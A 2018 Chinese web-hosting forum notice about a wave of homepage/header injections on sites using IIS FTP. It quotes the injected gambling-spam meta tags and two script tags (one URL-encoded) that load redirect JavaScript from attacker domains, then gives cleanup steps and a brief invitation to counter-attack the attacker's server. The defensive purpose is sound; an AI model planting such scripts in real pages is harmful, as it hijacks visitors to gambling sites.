因近期发现head 挂马数量明显增加,为保证用户数据安全,增加FTP关闭启用功能

0
回复
44
查看
[复制链接]
发表于 2018-11-30 14:35:48 | 显示全部楼层 |阅读模式
 
用户你好:
      关于近期发现部分网站head 或 index 挂马数量明显增高,其挂马被攻击的病症主要体现在安装有IIS自带FTP的网站上,没有安装win自带的站点未发现一例被挂马的情况;由此推断站点出现此类问题的原因疑似IIS自带FTP设计缺陷导致,排除代码无漏洞的情况下,虚拟主机解决此类问题的办法是在FTP不用的情况下关闭FTP。独立服务器或者云主机解决此类问题的办法是限制21或者其他的FTP端口到指定的IP上可以是固定IP或者本地IP。
  1. 相信很多的朋友都有遇见过,通过百度快照访问一个网站被跳转到另一个目标网站。
  2. 这就说明网站被劫持了,那么黑客为什么要劫持这些网站呢?黑客一般选择什么样的网站下手?下面我们就一起分析一下。
  3. 首先黑客一般都会选择信息类网站,购物网站等,因为这些网站的IP高,劫持这些网站能达到他们的引流目的。我们这来做一个假设,如果有100个用户准备访问A网站,但都被劫持到B网站了,那么只是会有10%的用户会对B网站产生兴趣,那么他们的引流目的就达到了,对于A网站而言,他们就损失了部分用户,这是他们不愿看见的,所以他们是很痛恨黑客的。
  4. 当然被黑客劫持的网站往往他们都会引流到一些菠菜类的网站,相信很多人看了都会有去搏一搏的心态,一玩不要紧,如果你的控制能力很差的话,那么你就深深的陷入了,这是一个吃人不吐骨头的,这里还是温馨的提醒大家 不要有赌博的心态,不说题外话了,下面我们就一起来看看所谓的木马。
复制代码
  1. <title>
  2. 大发时时彩|大发PK10|大发快三|〖手机购彩〗w9.c
  3. </title>
  4. <meta name="description" content="(w9.cc)
  5. 大发时时彩|大发PK10|大发快三|〖手机购彩〗w9.c
  6. " /><meta name="keywords" content="
  7. 大发时时彩|大发PK10|大发快三|〖手机购彩〗w9.c
  8. " />
  9. <script type="text/javascript"src="http://623488.com/sjgc003.js"></script>
  10. <script type="text/javascript"src="http://%76%6e%73%33%33%35%37%2e%63%6f%6d/%73%6a%67%63%30%30%35%2e%6a%73 "></script>
复制代码
以上代码是加载在首页或网页头部文件的代码,主要功能是判断通过搜索来的用户跳入他们网站,且改变关键词优化结果。有条件的站长可以攻一下试试,目前放置低在香港。为期6天的跟踪,大致判断操作本次规模性攻击的黑帽子在浙江一带!
  1. 如何清理:
  2. C:\Windows\System32\drivers\etc
  3. 找到这个文件增加跳转域名或者文件代码的域名
  4. 127.0.0.1  vns3357.com
  5. 127.0.0.1  623488.com
  6. 127.0.0.1  152588.com
  7. 127.0.0.1  www--88r.com
  8. 这样就不跳转了,然后找到对应的文件进行修复。
复制代码
对于这种情况很多站长找不到处理的头绪,其实首先解决的问题是屏蔽跳转,修改HOST文件定义被跳转域名到本地;降低访客风险
其次找到首页文档及网站头部文件,修正;并进行一次全面的代码检查并关闭21或者定制21到指定IP;切记不能使用弱口令。
回复

使用道具 举报

 
您需要登录后才可以回文 登录 | 立即注册 手机动态码快速登录

本版优币规则

关注我们:微信订阅号

官方微信

APP下载

全国服务热线:

4000606769

公司地址:东营市淄博路与西二路交叉路口

运营中心:成都市高新区天府三街218号峰汇中心

微信:dv289563686 Email:289563686#qq.com

Copyright   ©2004-2018  基地家园Powered by©Xorg!技术支持:天宇智能     ( ICP备09066343号 )